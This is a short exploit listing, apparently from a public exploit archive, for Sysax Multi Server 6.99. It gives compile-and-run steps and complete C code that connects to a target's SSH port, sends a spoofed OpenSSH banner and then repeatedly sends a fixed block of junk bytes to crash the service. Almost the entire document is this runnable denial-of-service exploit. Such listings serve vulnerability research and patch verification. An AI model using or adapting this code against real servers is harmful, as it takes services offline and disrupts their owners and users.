Share
## https://sploitus.com/exploit?id=PACKETSTORM:182468
# Exploit Title: Sysax Multi Server 6.99 - SSH Denial of Service  
# Date: 2024-11-03  
# Exploit Author: Yehia Elghaly (Mrvar0x)  
# Vendor Homepage: https://www.sysax.com/  
# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi  
# Version: Sysax Multi Server 6.99  
# Tested on: Windows 10 x64  
  
#Steps --> Compile (gcc -o ssh ssh.c)  
#Steps --> Run (sudo ./ssh <Target IP> <Port>)  
#Steps --> Crash (SSH Crashed)  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <unistd.h>  
#include <arpa/inet.h>  
#include <sys/socket.h>  
#include <netinet/tcp.h>  
  
void error_handling(const char *message) {  
perror(message);  
exit(1);  
}  
  
int main(int argc, char *argv[]) {  
if (argc != 3) {  
printf("Usage: %s <IP> <Port>\n", argv[0]);  
exit(1);  
}  
  
const char *host = argv[1];  
int port = atoi(argv[2]);  
  
unsigned char packet[] = {0x01, 0x02, 0x03, 0x04, 0xAA, 0xBB, 0xCC, 0xDD,   
0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0,   
0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0x00, 0xFF,   
0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80,   
0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A, 0x5A,   
0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF,   
0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08,   
0xF1, 0xE2, 0xD3, 0xC4, 0xB5, 0xA6, 0x97, 0x88,   
0x12, 0x34, 0x56, 0x78, 0x90, 0xAB, 0xCD, 0xEF,   
0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,  
0x88, 0x99, 0xAA, 0xBB, 0xCC, 0xDD, 0xEE, 0xFF,  
0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x99, 0x88,  
0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x00,  
  
};  
  
int sock = socket(AF_INET, SOCK_STREAM, 0);  
if (sock == -1) {  
error_handling("Socket creation failed");  
}  
  
int flag = 1;  
setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));  
struct linger sl = {1, 0}; // Close immediately  
setsockopt(sock, SOL_SOCKET, SO_LINGER, &sl, sizeof(sl));  
  
struct sockaddr_in serv_addr;  
memset(&serv_addr, 0, sizeof(serv_addr));  
serv_addr.sin_family = AF_INET;  
serv_addr.sin_addr.s_addr = inet_addr(host);  
serv_addr.sin_port = htons(port);  
  
if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) == -1) {  
error_handling("Connect failed");  
}  
  
const char *ssh_banner = "SSH-2.0-OpenSSH_7.1p1 Debian-5ubuntu1\r\n";  
if (send(sock, ssh_banner, strlen(ssh_banner), 0) == -1) {  
error_handling("Failed to send SSH banner");  
}  
usleep(100000);   
  
for (int i = 0; i < 5; ++i) {  
if (send(sock, packet, sizeof(packet), 0) == -1) {  
error_handling("Failed to send payload");  
}  
usleep(50000); // Short delay between sends  
}  
  
printf("Payload sent successfully.\n");  
  
char buffer[1024];  
ssize_t bytes_received = recv(sock, buffer, sizeof(buffer) - 1, 0);  
if (bytes_received > 0) {  
buffer[bytes_received] = '\0';  
printf("Received response: %s\n", buffer);  
} else {  
printf("No response received or connection closed.\n");  
}  
  
close(sock);  
return 0;  
}